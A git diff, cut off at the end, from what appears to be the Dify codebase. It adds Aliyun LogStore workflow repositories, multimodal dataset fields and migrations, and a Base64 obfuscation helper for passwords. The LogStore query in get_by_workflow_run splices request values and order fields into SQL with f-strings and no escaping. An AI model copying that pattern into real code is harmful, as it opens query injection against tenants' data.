a/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py b/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py new file mode 100644 index 0000000000..6e6631cfef --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py @@ -0,0 +1,164 @@ +import json +import logging +import os +import time +from typing import Union + +from sqlalchemy.engine import Engine +from sqlalchemy.orm import sessionmaker + +from core.repositories.sqlalchemy_workflow_execution_repository import SQLAlchemyWorkflowExecutionRepository +from core.workflow.entities import WorkflowExecution +from core.workflow.repositories.workflow_execution_repository import WorkflowExecutionRepository +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.helper import extract_tenant_id +from models import ( + Account, + CreatorUserRole, + EndUser, +) +from models.enums import WorkflowRunTriggeredFrom + +logger = logging.getLogger(__name__) + + +class LogstoreWorkflowExecutionRepository(WorkflowExecutionRepository): + def __init__( + self, + session_factory: sessionmaker | Engine, + user: Union[Account, EndUser], + app_id: str | None, + triggered_from: WorkflowRunTriggeredFrom | None, + ): + """ + Initialize the repository with a SQLAlchemy sessionmaker or engine and context information. + + Args: + session_factory: SQLAlchemy sessionmaker or engine for creating sessions + user: Account or EndUser object containing tenant_id, user ID, and role information + app_id: App ID for filtering by application (can be None) + triggered_from: Source of the execution trigger (DEBUGGING or APP_RUN) + """ + logger.debug( + "LogstoreWorkflowExecutionRepository.__init__: app_id=%s, triggered_from=%s", app_id, triggered_from + ) + # Initialize LogStore client + # Note: Project/logstore/index initialization is done at app startup via ext_logstore + self.logstore_client = AliyunLogStore() + + # Extract tenant_id from user + tenant_id = extract_tenant_id(user) + if not tenant_id: + raise ValueError("User must have a tenant_id or current_tenant_id") + self._tenant_id = tenant_id + + # Store app context + self._app_id = app_id + + # Extract user context + self._triggered_from = triggered_from + self._creator_user_id = user.id + + # Determine user role based on user type + self._creator_user_role = CreatorUserRole.ACCOUNT if isinstance(user, Account) else CreatorUserRole.END_USER + + # Initialize SQL repository for dual-write support + self.sql_repository = SQLAlchemyWorkflowExecutionRepository(session_factory, user, app_id, triggered_from) + + # Control flag for dual-write (write to both LogStore and SQL database) + # Set to True to enable dual-write for safe migration, False to use LogStore only + self._enable_dual_write = os.environ.get("LOGSTORE_DUAL_WRITE_ENABLED", "true").lower() == "true" + + def _to_logstore_model(self, domain_model: WorkflowExecution) -> list[tuple[str, str]]: + """ + Convert a domain model to a logstore model (List[Tuple[str, str]]). + + Args: + domain_model: The domain model to convert + + Returns: + The logstore model as a list of key-value tuples + """ + logger.debug( + "_to_logstore_model: id=%s, workflow_id=%s, status=%s", + domain_model.id_, + domain_model.workflow_id, + domain_model.status.value, + ) + # Use values from constructor if provided + if not self._triggered_from: + raise ValueError("triggered_from is required in repository constructor") + if not self._creator_user_id: + raise ValueError("created_by is required in repository constructor") + if not self._creator_user_role: + raise ValueError("created_by_role is required in repository constructor") + + # Generate log_version as nanosecond timestamp for record versioning + log_version = str(time.time_ns()) + + logstore_model = [ + ("id", domain_model.id_), + ("log_version", log_version), # Add log_version field for append-only writes + ("tenant_id", self._tenant_id), + ("app_id", self._app_id or ""), + ("workflow_id", domain_model.workflow_id), + ( + "triggered_from", + self._triggered_from.value if hasattr(self._triggered_from, "value") else str(self._triggered_from), + ), + ("type", domain_model.workflow_type.value), + ("version", domain_model.workflow_version), + ("graph", json.dumps(domain_model.graph, ensure_ascii=False) if domain_model.graph else "{}"), + ("inputs", json.dumps(domain_model.inputs, ensure_ascii=False) if domain_model.inputs else "{}"), + ("outputs", json.dumps(domain_model.outputs, ensure_ascii=False) if domain_model.outputs else "{}"), + ("status", domain_model.status.value), + ("error_message", domain_model.error_message or ""), + ("total_tokens", str(domain_model.total_tokens)), + ("total_steps", str(domain_model.total_steps)), + ("exceptions_count", str(domain_model.exceptions_count)), + ( + "created_by_role", + self._creator_user_role.value + if hasattr(self._creator_user_role, "value") + else str(self._creator_user_role), + ), + ("created_by", self._creator_user_id), + ("started_at", domain_model.started_at.isoformat() if domain_model.started_at else ""), + ("finished_at", domain_model.finished_at.isoformat() if domain_model.finished_at else ""), + ] + + return logstore_model + + def save(self, execution: WorkflowExecution) -> None: + """ + Save or update a WorkflowExecution domain entity to the logstore. + + This method serves as a domain-to-logstore adapter that: + 1. Converts the domain entity to its logstore representation + 2. Persists the logstore model using Aliyun SLS + 3. Maintains proper multi-tenancy by including tenant context during conversion + 4. Optionally writes to SQL database for dual-write support (controlled by LOGSTORE_DUAL_WRITE_ENABLED) + + Args: + execution: The WorkflowExecution domain entity to persist + """ + logger.debug( + "save: id=%s, workflow_id=%s, status=%s", execution.id_, execution.workflow_id, execution.status.value + ) + try: + logstore_model = self._to_logstore_model(execution) + self.logstore_client.put_log(AliyunLogStore.workflow_execution_logstore, logstore_model) + + logger.debug("Saved workflow execution to logstore: id=%s", execution.id_) + except Exception: + logger.exception("Failed to save workflow execution to logstore: id=%s", execution.id_) + raise + + # Dual-write to SQL database if enabled (for safe migration) + if self._enable_dual_write: + try: + self.sql_repository.save(execution) + logger.debug("Dual-write: saved workflow execution to SQL database: id=%s", execution.id_) + except Exception: + logger.exception("Failed to dual-write workflow execution to SQL database: id=%s", execution.id_) + # Don't raise - LogStore write succeeded, SQL is just a backup diff --git a/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py b/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py new file mode 100644 index 0000000000..400a089516 --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py @@ -0,0 +1,366 @@ +""" +LogStore implementation of the WorkflowNodeExecutionRepository. + +This module provides a LogStore-based repository for WorkflowNodeExecution entities, +using Aliyun SLS LogStore with append-only writes and version control. +""" + +import json +import logging +import os +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any, Union + +from sqlalchemy.engine import Engine +from sqlalchemy.orm import sessionmaker + +from core.model_runtime.utils.encoders import jsonable_encoder +from core.repositories import SQLAlchemyWorkflowNodeExecutionRepository +from core.workflow.entities import WorkflowNodeExecution +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionMetadataKey, WorkflowNodeExecutionStatus +from core.workflow.enums import NodeType +from core.workflow.repositories.workflow_node_execution_repository import OrderConfig, WorkflowNodeExecutionRepository +from core.workflow.workflow_type_encoder import WorkflowRuntimeTypeConverter +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.helper import extract_tenant_id +from models import ( + Account, + CreatorUserRole, + EndUser, + WorkflowNodeExecutionTriggeredFrom, +) + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_node_execution(data: dict[str, Any]) -> WorkflowNodeExecution: + """ + Convert LogStore result dictionary to WorkflowNodeExecution domain model. + + Args: + data: Dictionary from LogStore query result + + Returns: + WorkflowNodeExecution domain model instance + """ + logger.debug("_dict_to_workflow_node_execution: data keys=%s", list(data.keys())[:5]) + # Parse JSON fields + inputs = json.loads(data.get("inputs", "{}")) + process_data = json.loads(data.get("process_data", "{}")) + outputs = json.loads(data.get("outputs", "{}")) + metadata = json.loads(data.get("execution_metadata", "{}")) + + # Convert metadata to domain enum keys + domain_metadata = {} + for k, v in metadata.items(): + try: + domain_metadata[WorkflowNodeExecutionMetadataKey(k)] = v + except ValueError: + # Skip invalid metadata keys + continue + + # Convert status to domain enum + status = WorkflowNodeExecutionStatus(data.get("status", "running")) + + # Parse datetime fields + created_at = datetime.fromisoformat(data.get("created_at", "")) if data.get("created_at") else datetime.now() + finished_at = datetime.fromisoformat(data.get("finished_at", "")) if data.get("finished_at") else None + + return WorkflowNodeExecution( + id=data.get("id", ""), + node_execution_id=data.get("node_execution_id"), + workflow_id=data.get("workflow_id", ""), + workflow_execution_id=data.get("workflow_run_id"), + index=int(data.get("index", 0)), + predecessor_node_id=data.get("predecessor_node_id"), + node_id=data.get("node_id", ""), + node_type=NodeType(data.get("node_type", "start")), + title=data.get("title", ""), + inputs=inputs, + process_data=process_data, + outputs=outputs, + status=status, + error=data.get("error"), + elapsed_time=float(data.get("elapsed_time", 0.0)), + metadata=domain_metadata, + created_at=created_at, + finished_at=finished_at, + ) + + +class LogstoreWorkflowNodeExecutionRepository(WorkflowNodeExecutionRepository): + """ + LogStore implementation of the WorkflowNodeExecutionRepository interface. + + This implementation uses Aliyun SLS LogStore with an append-only write strategy: + - Each save() operation appends a new record with a version timestamp + - Updates are simulated by writing new records with higher version numbers + - Queries retrieve the latest version using finished_at IS NOT NULL filter + - Multi-tenancy is maintained through tenant_id filtering + + Version Strategy: + version = time.time_ns() # Nanosecond timestamp for unique ordering + """ + + def __init__( + self, + session_factory: sessionmaker | Engine, + user: Union[Account, EndUser], + app_id: str | None, + triggered_from: WorkflowNodeExecutionTriggeredFrom | None, + ): + """ + Initialize the repository with a SQLAlchemy sessionmaker or engine and context information. + + Args: + session_factory: SQLAlchemy sessionmaker or engine for creating sessions + user: Account or EndUser object containing tenant_id, user ID, and role information + app_id: App ID for filtering by application (can be None) + triggered_from: Source of the execution trigger (SINGLE_STEP or WORKFLOW_RUN) + """ + logger.debug( + "LogstoreWorkflowNodeExecutionRepository.__init__: app_id=%s, triggered_from=%s", app_id, triggered_from + ) + # Initialize LogStore client + self.logstore_client = AliyunLogStore() + + # Extract tenant_id from user + tenant_id = extract_tenant_id(user) + if not tenant_id: + raise ValueError("User must have a tenant_id or current_tenant_id") + self._tenant_id = tenant_id + + # Store app context + self._app_id = app_id + + # Extract user context + self._triggered_from = triggered_from + self._creator_user_id = user.id + + # Determine user role based on user type + self._creator_user_role = CreatorUserRole.ACCOUNT if isinstance(user, Account) else CreatorUserRole.END_USER + + # Initialize SQL repository for dual-write support + self.sql_repository = SQLAlchemyWorkflowNodeExecutionRepository(session_factory, user, app_id, triggered_from) + + # Control flag for dual-write (write to both LogStore and SQL database) + # Set to True to enable dual-write for safe migration, False to use LogStore only + self._enable_dual_write = os.environ.get("LOGSTORE_DUAL_WRITE_ENABLED", "true").lower() == "true" + + def _to_logstore_model(self, domain_model: WorkflowNodeExecution) -> Sequence[tuple[str, str]]: + logger.debug( + "_to_logstore_model: id=%s, node_id=%s, status=%s", + domain_model.id, + domain_model.node_id, + domain_model.status.value, + ) + if not self._triggered_from: + raise ValueError("triggered_from is required in repository constructor") + if not self._creator_user_id: + raise ValueError("created_by is required in repository constructor") + if not self._creator_user_role: + raise ValueError("created_by_role is required in repository constructor") + + # Generate log_version as nanosecond timestamp for record versioning + log_version = str(time.time_ns()) + + json_converter = WorkflowRuntimeTypeConverter() + + logstore_model = [ + ("id", domain_model.id), + ("log_version", log_version), # Add log_version field for append-only writes + ("tenant_id", self._tenant_id), + ("app_id", self._app_id or ""), + ("workflow_id", domain_model.workflow_id), + ( + "triggered_from", + self._triggered_from.value if hasattr(self._triggered_from, "value") else str(self._triggered_from), + ), + ("workflow_run_id", domain_model.workflow_execution_id or ""), + ("index", str(domain_model.index)), + ("predecessor_node_id", domain_model.predecessor_node_id or ""), + ("node_execution_id", domain_model.node_execution_id or ""), + ("node_id", domain_model.node_id), + ("node_type", domain_model.node_type.value), + ("title", domain_model.title), + ( + "inputs", + json.dumps(json_converter.to_json_encodable(domain_model.inputs), ensure_ascii=False) + if domain_model.inputs + else "{}", + ), + ( + "process_data", + json.dumps(json_converter.to_json_encodable(domain_model.process_data), ensure_ascii=False) + if domain_model.process_data + else "{}", + ), + ( + "outputs", + json.dumps(json_converter.to_json_encodable(domain_model.outputs), ensure_ascii=False) + if domain_model.outputs + else "{}", + ), + ("status", domain_model.status.value), + ("error", domain_model.error or ""), + ("elapsed_time", str(domain_model.elapsed_time)), + ( + "execution_metadata", + json.dumps(jsonable_encoder(domain_model.metadata), ensure_ascii=False) + if domain_model.metadata + else "{}", + ), + ("created_at", domain_model.created_at.isoformat() if domain_model.created_at else ""), + ("created_by_role", self._creator_user_role.value), + ("created_by", self._creator_user_id), + ("finished_at", domain_model.finished_at.isoformat() if domain_model.finished_at else ""), + ] + + return logstore_model + + def save(self, execution: WorkflowNodeExecution) -> None: + """ + Save or update a NodeExecution domain entity to LogStore. + + This method serves as a domain-to-logstore adapter that: + 1. Converts the domain entity to its logstore representation + 2. Appends a new record with a log_version timestamp + 3. Maintains proper multi-tenancy by including tenant context during conversion + 4. Optionally writes to SQL database for dual-write support (controlled by LOGSTORE_DUAL_WRITE_ENABLED) + + Each save operation creates a new record. Updates are simulated by writing + new records with higher log_version numbers. + + Args: + execution: The NodeExecution domain entity to persist + """ + logger.debug( + "save: id=%s, node_execution_id=%s, status=%s", + execution.id, + execution.node_execution_id, + execution.status.value, + ) + try: + logstore_model = self._to_logstore_model(execution) + self.logstore_client.put_log(AliyunLogStore.workflow_node_execution_logstore, logstore_model) + + logger.debug( + "Saved node execution to LogStore: id=%s, node_execution_id=%s, status=%s", + execution.id, + execution.node_execution_id, + execution.status.value, + ) + except Exception: + logger.exception( + "Failed to save node execution to LogStore: id=%s, node_execution_id=%s", + execution.id, + execution.node_execution_id, + ) + raise + + # Dual-write to SQL database if enabled (for safe migration) + if self._enable_dual_write: + try: + self.sql_repository.save(execution) + logger.debug("Dual-write: saved node execution to SQL database: id=%s", execution.id) + except Exception: + logger.exception("Failed to dual-write node execution to SQL database: id=%s", execution.id) + # Don't raise - LogStore write succeeded, SQL is just a backup + + def save_execution_data(self, execution: WorkflowNodeExecution) -> None: + """ + Save or update the inputs, process_data, or outputs associated with a specific + node_execution record. + + For LogStore implementation, this is similar to save() since we always write + complete records. We append a new record with updated data fields. + + Args: + execution: The NodeExecution instance with data to save + """ + logger.debug("save_execution_data: id=%s, node_execution_id=%s", execution.id, execution.node_execution_id) + # In LogStore, we simply write a new complete record with the data + # The log_version timestamp will ensure this is treated as the latest version + self.save(execution) + + def get_by_workflow_run( + self, + workflow_run_id: str, + order_config: OrderConfig | None = None, + ) -> Sequence[WorkflowNodeExecution]: + """ + Retrieve all NodeExecution instances for a specific workflow run. + Uses LogStore SQL query with finished_at IS NOT NULL filter for deduplication. + This ensures we only get the final version of each node execution. + Args: + workflow_run_id: The workflow run ID + order_config: Optional configuration for ordering results + order_config.order_by: List of fields to order by (e.g., ["index", "created_at"]) + order_config.order_direction: Direction to order ("asc" or "desc") + + Returns: + A list of NodeExecution instances + + Note: + This method filters by finished_at IS NOT NULL to avoid duplicates from + version updates. For complete history including intermediate states, + a different query strategy would be needed. + """ + logger.debug("get_by_workflow_run: workflow_run_id=%s, order_config=%s", workflow_run_id, order_config) + # Build SQL query with deduplication using finished_at IS NOT NULL + # This optimization avoids window functions for common case where we only + # want the final state of each node execution + + # Build ORDER BY clause + order_clause = "" + if order_config and order_config.order_by: + order_fields = [] + for field in order_config.order_by: + # Map domain field names to logstore field names if needed + field_name = field + if order_config.order_direction == "desc": + order_fields.append(f"{field_name} DESC") + else: + order_fields.append(f"{field_name} ASC") + if order_fields: + order_clause = "ORDER BY " + ", ".join(order_fields) + + sql = f""" + SELECT * + FROM {AliyunLogStore.workflow_node_execution_logstore} + WHERE workflow_run_id='{workflow_run_id}' + AND tenant_id='{self._tenant_id}' + AND finished_at IS NOT NULL + """ + + if self._app_id: + sql += f" AND app_id='{self._app_id}'" + + if order_clause: + sql += f" {order_clause}" + + try: + # Execute SQL query + results = self.logstore_client.execute_sql( + sql=sql, + query="*", + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + + # Convert LogStore results to WorkflowNodeExecution domain models + executions = [] + for row in results: + try: + execution = _dict_to_workflow_node_execution(row) + executions.append(execution) + except Exception as e: + logger.warning("Failed to convert row to WorkflowNodeExecution: %s, row=%s", e, row) + continue + + return executions + + except Exception: + logger.exception("Failed to retrieve node executions from LogStore: workflow_run_id=%s", workflow_run_id) + raise diff --git a/api/extensions/otel/decorators/base.py b/api/extensions/otel/decorators/base.py index 9604a3b6d5..14221d24dd 100644 --- a/api/extensions/otel/decorators/base.py +++ b/api/extensions/otel/decorators/base.py @@ -1,5 +1,4 @@ import functools -import os from collections.abc import Callable from typing import Any, TypeVar, cast @@ -7,22 +6,13 @@ from opentelemetry.trace import get_tracer from configs import dify_config from extensions.otel.decorators.handler import SpanHandler +from extensions.otel.runtime import is_instrument_flag_enabled T = TypeVar("T", bound=Callable[..., Any]) _HANDLER_INSTANCES: dict[type[SpanHandler], SpanHandler] = {SpanHandler: SpanHandler()} -def _is_instrument_flag_enabled() -> bool: - """ - Check if external instrumentation is enabled via environment variable. - - Third-party non-invasive instrumentation agents set this flag to coordinate - with Dify's manual OpenTelemetry instrumentation. - """ - return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" - - def _get_handler_instance(handler_class: type[SpanHandler]) -> SpanHandler: """Get or create a singleton instance of the handler class.""" if handler_class not in _HANDLER_INSTANCES: @@ -43,7 +33,7 @@ def trace_span(handler_class: type[SpanHandler] | None = None) -> Callable[[T], def decorator(func: T) -> T: @functools.wraps(func) def wrapper(*args: Any, **kwargs: Any) -> Any: - if not (dify_config.ENABLE_OTEL or _is_instrument_flag_enabled()): + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): return func(*args, **kwargs) handler = _get_handler_instance(handler_class or SpanHandler) diff --git a/api/extensions/otel/runtime.py b/api/extensions/otel/runtime.py index 16f5ccf488..a7181d2683 100644 --- a/api/extensions/otel/runtime.py +++ b/api/extensions/otel/runtime.py @@ -1,4 +1,5 @@ import logging +import os import sys from typing import Union @@ -71,3 +72,13 @@ def init_celery_worker(*args, **kwargs): if dify_config.DEBUG: logger.info("Initializing OpenTelemetry for Celery worker") CeleryInstrumentor(tracer_provider=tracer_provider, meter_provider=metric_provider).instrument() + + +def is_instrument_flag_enabled() -> bool: + """ + Check if external instrumentation is enabled via environment variable. + + Third-party non-invasive instrumentation agents set this flag to coordinate + with Dify's manual OpenTelemetry instrumentation. + """ + return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" diff --git a/api/extensions/storage/opendal_storage.py b/api/extensions/storage/opendal_storage.py index a084844d72..83c5c2d12f 100644 --- a/api/extensions/storage/opendal_storage.py +++ b/api/extensions/storage/opendal_storage.py @@ -87,15 +87,16 @@ class OpenDALStorage(BaseStorage): if not self.exists(path): raise FileNotFoundError("Path not found") - all_files = self.op.scan(path=path) + # Use the new OpenDAL 0.46.0+ API with recursive listing + lister = self.op.list(path, recursive=True) if files and directories: logger.debug("files and directories on %s scanned", path) - return [f.path for f in all_files] + return [entry.path for entry in lister] if files: logger.debug("files on %s scanned", path) - return [f.path for f in all_files if not f.path.endswith("/")] + return [entry.path for entry in lister if not entry.metadata.is_dir] elif directories: logger.debug("directories on %s scanned", path) - return [f.path for f in all_files if f.path.endswith("/")] + return [entry.path for entry in lister if entry.metadata.is_dir] else: raise ValueError("At least one of files or directories must be True") diff --git a/api/factories/file_factory.py b/api/factories/file_factory.py index 737a79f2b0..bd71f18af2 100644 --- a/api/factories/file_factory.py +++ b/api/factories/file_factory.py @@ -1,3 +1,4 @@ +import logging import mimetypes import os import re @@ -17,6 +18,8 @@ from core.helper import ssrf_proxy from extensions.ext_database import db from models import MessageFile, ToolFile, UploadFile +logger = logging.getLogger(__name__) + def build_from_message_files( *, @@ -356,15 +359,20 @@ def _build_from_tool_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + # Backward/interop compatibility: allow tool_file_id to come from related_id or URL + tool_file_id = mapping.get("tool_file_id") + + if not tool_file_id: + raise ValueError(f"ToolFile {tool_file_id} not found") tool_file = db.session.scalar( select(ToolFile).where( - ToolFile.id == mapping.get("tool_file_id"), + ToolFile.id == tool_file_id, ToolFile.tenant_id == tenant_id, ) ) if tool_file is None: - raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found") + raise ValueError(f"ToolFile {tool_file_id} not found") extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin" @@ -402,10 +410,13 @@ def _build_from_datasource_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + datasource_file_id = mapping.get("datasource_file_id") + if not datasource_file_id: + raise ValueError(f"DatasourceFile {datasource_file_id} not found") datasource_file = ( db.session.query(UploadFile) .where( - UploadFile.id == mapping.get("datasource_file_id"), + UploadFile.id == datasource_file_id, UploadFile.tenant_id == tenant_id, ) .first() diff --git a/api/fields/dataset_fields.py b/api/fields/dataset_fields.py index 89c4d8fba9..1e5ec7d200 100644 --- a/api/fields/dataset_fields.py +++ b/api/fields/dataset_fields.py @@ -97,11 +97,27 @@ dataset_detail_fields = { "total_documents": fields.Integer, "total_available_documents": fields.Integer, "enable_api": fields.Boolean, + "is_multimodal": fields.Boolean, +} + +file_info_fields = { + "id": fields.String, + "name": fields.String, + "size": fields.Integer, + "extension": fields.String, + "mime_type": fields.String, + "source_url": fields.String, +} + +content_fields = { + "content_type": fields.String, + "content": fields.String, + "file_info": fields.Nested(file_info_fields, allow_null=True), } dataset_query_detail_fields = { "id": fields.String, - "content": fields.String, + "queries": fields.Nested(content_fields), "source": fields.String, "source_app_id": fields.String, "created_by_role": fields.String, diff --git a/api/fields/file_fields.py b/api/fields/file_fields.py index c12ebc09c8..a707500445 100644 --- a/api/fields/file_fields.py +++ b/api/fields/file_fields.py @@ -9,6 +9,8 @@ upload_config_fields = { "video_file_size_limit": fields.Integer, "audio_file_size_limit": fields.Integer, "workflow_file_upload_limit": fields.Integer, + "image_file_batch_limit": fields.Integer, + "single_chunk_attachment_limit": fields.Integer, } diff --git a/api/fields/hit_testing_fields.py b/api/fields/hit_testing_fields.py index 75bdff1803..e70f9fa722 100644 --- a/api/fields/hit_testing_fields.py +++ b/api/fields/hit_testing_fields.py @@ -43,9 +43,19 @@ child_chunk_fields = { "score": fields.Float, } +files_fields = { + "id": fields.String, + "name": fields.String, + "size": fields.Integer, + "extension": fields.String, + "mime_type": fields.String, + "source_url": fields.String, +} + hit_testing_record_fields = { "segment": fields.Nested(segment_fields), "child_chunks": fields.List(fields.Nested(child_chunk_fields)), "score": fields.Float, "tsne_position": fields.Raw, + "files": fields.List(fields.Nested(files_fields)), } diff --git a/api/fields/segment_fields.py b/api/fields/segment_fields.py index 2ff917d6bc..56d6b68378 100644 --- a/api/fields/segment_fields.py +++ b/api/fields/segment_fields.py @@ -13,6 +13,15 @@ child_chunk_fields = { "updated_at": TimestampField, } +attachment_fields = { + "id": fields.String, + "name": fields.String, + "size": fields.Integer, + "extension": fields.String, + "mime_type": fields.String, + "source_url": fields.String, +} + segment_fields = { "id": fields.String, "position": fields.Integer, @@ -39,4 +48,5 @@ segment_fields = { "error": fields.String, "stopped_at": TimestampField, "child_chunks": fields.List(fields.Nested(child_chunk_fields)), + "attachments": fields.List(fields.Nested(attachment_fields)), } diff --git a/api/libs/encryption.py b/api/libs/encryption.py new file mode 100644 index 0000000000..81be8cce97 --- /dev/null +++ b/api/libs/encryption.py @@ -0,0 +1,66 @@ +""" +Field Encoding/Decoding Utilities + +Provides Base64 decoding for sensitive fields (password, verification code) +received from the frontend. + +Note: This uses Base64 encoding for obfuscation, not cryptographic encryption. +Real security relies on HTTPS for transport layer encryption. +""" + +import base64 +import logging + +logger = logging.getLogger(__name__) + + +class FieldEncryption: + """Handle decoding of sensitive fields during transmission""" + + @classmethod + def decrypt_field(cls, encoded_text: str) -> str | None: + """ + Decode Base64 encoded field from frontend. + + Args: + encoded_text: Base64 encoded text from frontend + + Returns: + Decoded plaintext, or None if decoding fails + """ + try: + # Decode base64 + decoded_bytes = base64.b64decode(encoded_text) + decoded_text = decoded_bytes.decode("utf-8") + logger.debug("Field decoding successful") + return decoded_text + + except Exception: + # Decoding failed - return None to trigger error in caller + return None + + @classmethod + def decrypt_password(cls, encrypted_password: str) -> str | None: + """ + Decrypt password field + + Args: + encrypted_password: Encrypted password from frontend + + Returns: + Decrypted password or None if decryption fails + """ + return cls.decrypt_field(encrypted_password) + + @classmethod + def decrypt_verification_code(cls, encrypted_code: str) -> str | None: + """ + Decrypt verification code field + + Args: + encrypted_code: Encrypted code from frontend + + Returns: + Decrypted code or None if decryption fails + """ + return cls.decrypt_field(encrypted_code) diff --git a/api/libs/helper.py b/api/libs/helper.py index 0506e0ed5f..74e1808e49 100644 --- a/api/libs/helper.py +++ b/api/libs/helper.py @@ -11,6 +11,7 @@ from collections.abc import Generator, Mapping from datetime import datetime from hashlib import sha256 from typing import TYPE_CHECKING, Annotated, Any, Optional, Union, cast +from uuid import UUID from zoneinfo import available_timezones from flask import Response, stream_with_context @@ -107,7 +108,7 @@ def email(email): EmailStr = Annotated[str, AfterValidator(email)] -def uuid_value(value): +def uuid_value(value: Any) -> str: if value == "": return str(value) @@ -119,6 +120,19 @@ def uuid_value(value): raise ValueError(error) +def normalize_uuid(value: str | UUID) -> str: + if not value: + return "" + + try: + return uuid_value(value) + except ValueError as exc: + raise ValueError("must be a valid UUID") from exc + + +UUIDStrOrEmpty = Annotated[str, AfterValidator(normalize_uuid)] + + def alphanumeric(value: str): # check if the value is alphanumeric and underlined if re.match(r"^[a-zA-Z0-9_]+$", value): @@ -184,7 +198,7 @@ def timezone(timezone_string): def convert_datetime_to_date(field, target_timezone: str = ":tz"): if dify_config.DB_TYPE == "postgresql": return f"DATE(DATE_TRUNC('day', {field} AT TIME ZONE 'UTC' AT TIME ZONE {target_timezone}))" - elif dify_config.DB_TYPE == "mysql": + elif dify_config.DB_TYPE in ["mysql", "oceanbase", "seekdb"]: return f"DATE(CONVERT_TZ({field}, 'UTC', {target_timezone}))" else: raise NotImplementedError(f"Unsupported database type: {dify_config.DB_TYPE}") @@ -215,7 +229,11 @@ def generate_text_hash(text: str) -> str: def compact_generate_response(response: Union[Mapping, Generator, RateLimitGenerator]) -> Response: if isinstance(response, dict): - return Response(response=json.dumps(jsonable_encoder(response)), status=200, mimetype="application/json") + return Response( + response=json.dumps(jsonable_encoder(response)), + status=200, + content_type="application/json; charset=utf-8", + ) else: def generate() -> Generator: diff --git a/api/migrations/versions/2025_11_12_1537-d57accd375ae_support_multi_modal.py b/api/migrations/versions/2025_11_12_1537-d57accd375ae_support_multi_modal.py new file mode 100644 index 0000000000..187bf7136d --- /dev/null +++ b/api/migrations/versions/2025_11_12_1537-d57accd375ae_support_multi_modal.py @@ -0,0 +1,57 @@ +"""support-multi-modal + +Revision ID: d57accd375ae +Revises: 03f8dcbc611e +Create Date: 2025-11-12 15:37:12.363670 + +""" +from alembic import op +import models as models +import sqlalchemy as sa + + +# revision identifiers, used by Alembic. +revision = 'd57accd375ae' +down_revision = '7bb281b7a422' +branch_labels = None +depends_on = None + + +def upgrade(): + # ### commands auto generated by Alembic - please adjust! ### + op.create_table('segment_attachment_bindings', + sa.Column('id', models.types.StringUUID(), nullable=False), + sa.Column('tenant_id', models.types.StringUUID(), nullable=False), + sa.Column('dataset_id', models.types.StringUUID(), nullable=False), + sa.Column('document_id', models.types.StringUUID(), nullable=False), + sa.Column('segment_id', models.types.StringUUID(), nullable=False), + sa.Column('attachment_id', models.types.StringUUID(), nullable=False), + sa.Column('created_at', sa.DateTime(), server_default=sa.text("CURRENT_TIMESTAMP"), nullable=False), + sa.PrimaryKeyConstraint('id', name='segment_attachment_binding_pkey') + ) + with op.batch_alter_table('segment_attachment_bindings', schema=None) as batch_op: + batch_op.create_index( + 'segment_attachment_binding_tenant_dataset_document_segment_idx', + ['tenant_id', 'dataset_id', 'document_id', 'segment_id'], + unique=False + ) + batch_op.create_index('segment_attachment_binding_attachment_idx', ['attachment_id'], unique=False) + + with op.batch_alter_table('datasets', schema=None) as batch_op: + batch_op.add_column(sa.Column('is_multimodal', sa.Boolean(), server_default=sa.text('false'), nullable=False)) + + # ### end Alembic commands ### + + +def downgrade(): + # ### commands auto generated by Alembic - please + with op.batch_alter_table('datasets', schema=None) as batch_op: + batch_op.drop_column('is_multimodal') + + + with op.batch_alter_table('segment_attachment_bindings', schema=None) as batch_op: + batch_op.drop_index('segment_attachment_binding_attachment_idx') + batch_op.drop_index('segment_attachment_binding_tenant_dataset_document_segment_idx') + + op.drop_table('segment_attachment_bindings') + # ### end Alembic commands ### diff --git a/api/migrations/versions/2025_11_15_2102-09cfdda155d1_mysql_adaptation.py b/api/migrations/versions/2025_11_15_2102-09cfdda155d1_mysql_adaptation.py index a3f6c3cb19..877fa2f309 100644 --- a/api/migrations/versions/2025_11_15_2102-09cfdda155d1_mysql_adaptation.py +++ b/api/migrations/versions/2025_11_15_2102-09cfdda155d1_mysql_adaptation.py @@ -1,4 +1,4 @@ -"""empty message +"""mysql adaptation Revision ID: 09cfdda155d1 Revises: 669ffd70119c @@ -97,11 +97,31 @@ def downgrade(): batch_op.alter_column('include_plugins', existing_type=sa.JSON(), type_=postgresql.ARRAY(sa.VARCHAR(length=255)), - existing_nullable=False) + existing_nullable=False, + postgresql_using=""" + COALESCE( + regexp_replace( + replace(replace(include_plugins::text, '[', '{'), ']', '}'), + '"', + '', + 'g' + )::varchar(255)[], + ARRAY[]::varchar(255)[] + )""") batch_op.alter_column('exclude_plugins', existing_type=sa.JSON(), type_=postgresql.ARRAY(sa.VARCHAR(length=255)), - existing_nullable=False) + existing_nullable=False, + postgresql_using=""" + COALESCE( + regexp_replace( + replace(replace(exclude_plugins::text, '[', '{'), ']', '}'), + '"', + '', + 'g' + )::varchar(255)[], + ARRAY[]::varchar(255)[] + )""") with op.batch_alter_table('external_knowledge_bindings', schema=None) as batch_op: batch_op.alter_column('external_knowledge_id', diff --git a/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py new file mode 100644 index 0000000000..2bdd430e81 --- /dev/null +++ b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py @@ -0,0 +1,31 @@ +"""add type column not null default tool + +Revision ID: 03ea244985ce 